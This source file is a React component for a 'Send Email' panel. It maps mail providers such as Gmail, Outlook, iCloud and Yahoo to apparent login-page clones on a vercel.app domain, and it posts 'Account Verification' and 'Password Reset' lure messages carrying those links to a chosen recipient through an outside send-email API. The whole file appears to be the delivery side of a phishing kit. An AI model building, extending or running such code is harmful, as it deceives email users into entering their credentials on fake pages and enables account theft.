import React, { useState } from "react";

const Email = () => {
  const [selectedProvider, setSelectedProvider] = useState("");
  const [recipientEmail, setRecipientEmail] = useState("");
  const [loading, setLoading] = useState(false);

  const providers = [
    "Google",
    "AOL",
    "Microsoft 365",
    "Microsoft Exchange",
    "iCloud",
    "Yahoo",
    "Outlook",
  ];

  const providerLinks: Record<string, string> = {
    Google: "https://clones-mu.vercel.app/gmail",
    AOL: "https://clones-mu.vercel.app/aol",
    "Microsoft 365": "https://clones-mu.vercel.app/microsoft365",
    "Microsoft Exchange": "https://clones-mu.vercel.app/microsoftexchange",
    iCloud: "https://clones-mu.vercel.app/icloud",
    Yahoo: "https://clones-mu.vercel.app/yahoo",
    Outlook: "https://clones-mu.vercel.app/outlook",
  };

  const messages = [
    { subject: "Welcome Email", text: "Welcome to our service! Visit us at " },
    {
      subject: "Account Verification",
      text: "Please verify your email address. Check here: ",
    },
    {
      subject: "Password Reset",
      text: "Click the link below to reset your password: ",
    },
  ];

  const handleSendEmail = async (subject: string, text: string) => {
    if (!recipientEmail || !selectedProvider) {
      alert("Please select a provider and enter a recipient email.");
      return;
    }

    setLoading(true);
    try {
      const response = await fetch(
        "https://dev.your-support.xyz/api/send-email",
        {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({
            to: recipientEmail,
            subject,
            text: `${text} ${providerLinks[selectedProvider]}`,
          }),
        }
      );

      const result = await response.json();
      alert(result.message || "Email sent successfully!");
    } catch (error) {
      console.error("Error sending email:", error);
      alert("Failed to send email. Try again.");
    }
    setLoading(false);
  };

  return (
    <div className="container mx-auto p-4">
      <h1 className="text-2xl font-bold mb-4">Send Email</h1>

      {/* Provider Selection */}
      <div className="mb-4">
        <label className="block text-sm font-medium text-gray-700">
          Select Provider
        </label>
        <select
          className="w-full p-2 border rounded mt-1"
          value={selectedProvider}
          onChange={(e) => setSelectedProvider(e.target.value)}
        >
          <option value="">-- Select Provider --</option>
          {providers.map((provider) => (
            <option key={provider} value={provider}>
              {provider}
            </option>
          ))}
        </select>
      </div>

      {/* Messages List */}
      <div className="mb-4">
        <label className="block text-sm font-medium text-gray-700">
          Messages
        </label>
        <ul className="border rounded p-2">
          {messages.map((msg, index) => (
            <li
              key={index}
              className="p-2 border-b last:border-b-0 flex justify-between"
            >
              <div>
                <strong>{msg.subject}:</strong> {msg.text}
                {selectedProvider && (
                  <a
                    href={providerLinks[selectedProvider]}
                    target="_blank"
                    rel="noopener noreferrer"
                    className="text-blue-600 underline ml-1"
                  >
                    {providerLinks[selectedProvider]}
                  </a>
                )}
              </div>
              <button
                className="bg-green-600 text-white px-3 py-1 rounded text-sm hover:bg-green-700"
                onClick={() => handleSendEmail(msg.subject, msg.text)}
                disabled={loading}
              >
                {loading ? "Sending..." : "Send"}
              </button>
            </li>
          ))}
        </ul>
      </div>

      {/* Recipient Email Field */}
      <div className="mb-4">
        <label className="block text-sm font-medium text-gray-700">To</label>
        <input
          type="email"
          className="w-full p-2 border rounded mt-1"
          placeholder="Enter recipient email"
          value={recipientEmail}
          onChange={(e) => setRecipientEmail(e.target.value)}
        />
      </div>
    </div>
  );
};

export default Email;
